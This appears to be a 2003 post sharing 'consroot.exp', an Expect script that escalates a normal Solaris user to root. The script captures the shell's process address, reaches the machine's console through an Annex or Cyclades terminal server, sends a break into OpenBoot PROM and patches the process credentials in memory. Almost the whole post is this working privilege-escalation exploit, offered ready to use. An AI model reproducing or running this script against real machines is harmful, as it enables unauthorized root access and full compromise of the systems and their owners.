consroot.exp

`Hi there,  
  
here is a fully automated script for getting a root shell using a normal user account  
and (remote-)console acces. The Script was written by me based on an article  
from phrack.com (article #53 - hacking forth by mudge)  
  
---snip---  
#  
# ---> consroot.exp <---  
# by mickeyX 16.6.2003  
#  
# connects to a SUN and a Terminalserver and hacks the OBP to get a root shell.  
# You need:  
# - a "normal" user account on a SUN  
# - terminalserveraccess on the same SUN  
#  
# this was tested on:  
# - MacOS X version 10.2.6 using expect 5.38.0  
# - Solaris 8 using expect 5.25.0  
# - ANNEX terminalservers  
# - CYCLADES terminalservers  
#  
# This is just a prototype ! Use with care on other terminalservers !  
#  
#  
set timeout 2  
set MODE [lindex $argv 0]  
set TARGET [lindex $argv 1]  
set UID [lindex $argv 2]  
set PW [lindex $argv 3]  
set CTYPE [lindex $argv 4]  
set TSERVER [lindex $argv 5]  
set TPORT [lindex $argv 6]  
set TPW [lindex $argv 7]  
set LOG log.txt  
proc usage {} {  
puts "\nusage: expect consroot <  
TERMINALSERVER> "  
puts "\twhere MODE is one of:"  
puts "\t\tT = Target is using TELNET"  
puts "\t\tS = Target is using SSH"  
puts "\tTARGET = machine to hack"  
puts "\tUSER = unprivileged user on target host"  
puts "\tPW = password on target host"  
puts "\n\twhere CONSOLETYPE is one of:"  
puts "\t\tA = Target is connected to Annex Terminalserver"  
puts "\t\tC = Target is connected to Cyclades Terminalserver\n"  
puts "\tTERMINALSERVER = consoleaccess for target host"  
puts "\tPORT = TCP/IP-port (!) on terminalserver where target is connected"  
puts "\tTPW = password for terminalserverport\n"  
exit 1  
}  
###  
# MAIN  
###  
if { $argc < 8 } usage  
# check for Terminalservertypes...  
switch -- $CTYPE \  
A {  
} C {  
} default usage  
# check for connect-Mode...  
switch -- $MODE \  
T { spawn telnet $TARGET  
set main_session $spawn_id  
expect "ogin:"  
send "$UID\n"  
expect "assword"  
send "$PW\n"  
} S { spawn ssh -l $UID $TARGET   
set main_session $spawn_id  
expect "assword"  
send "$PW\n"  
} default usage  
# start korn-shell...  
expect { exp_continue }  
send "exec /usr/bin/ksh\n"  
# set defined prompt - so we can scan for it...  
send "export PS1=PROMPT:\n"  
# activate logging for getting credentials Adress...  
log_file -noappend $LOG  
###  
# get adress for OBP-hacking:  
###  
send "/usr/bin/ps -o addr -p $$\n"  
expect "ADDR"  
expect "PROMPT:"  
set ADRESS [exec sh "-c" "cat $LOG | grep -v PROMPT: | tail -1"]  
puts "\nReceived ADRESS from shell was: $ADRESS\n"  
###  
###  
###  
# reset logfile...  
exec sh "-c" "1>$LOG"  
###  
# get OS-architecture for OBP-hacking:  
###  
send "/usr/bin/isainfo -b\n"  
expect "*" # clear expect buffer  
expect "PROMPT:"  
set ARC [exec sh "-c" "cat $LOG | tail -2 | head -1"]  
puts "\nReceived Architecture was: $ARC\n"  
exec "rm" "-f" "$LOG"  
###  
###  
###  
# connect to Terminalserver...  
puts "\nPlease wait while connecting to Terminalserver...\n"  
spawn telnet -e "#" $TSERVER $TPORT  
switch -- $CTYPE \  
A { puts "\nstarting Annex connect ...\n"  
expect "Port password"  
send "$TPW\n"   
expect "Permission granted"  
} C { puts "\nstarting Cyclades connect ...\n"  
expect "Port*:"  
send "$TPW\n"  
expect "Password:"  
send "$TPW\n"   
expect "*"  
}  
# hack OBP...  
send "#\n"  
expect "telnet"  
send "send brk\n"  
expect "ok"  
# let's ROCK and ROLL !!!  
switch -- $ARC \  
64 { send "hex 0 $ADRESS 20 + x@ 4 + l!\n"  
} 32 { send "hex 0 $ADRESS 14 + l@ 4 + l!\n"  
}  
expect "ok"  
send "go\r"  
# deactivate logging...  
log_file  
exec rm "-f" "$LOG"  
# give control to admin...  
set spawn_id $main_session  
send "\r"  
expect "PROMPT:"  
send "id\n"  
expect "PROMPT:"  
interact  
---snip---  
  
--   
UNIX is like a wigwam: no windows, no gates, apache inside, stable.  
Windows is not the answer - it's the question. No is the answer.  
  
`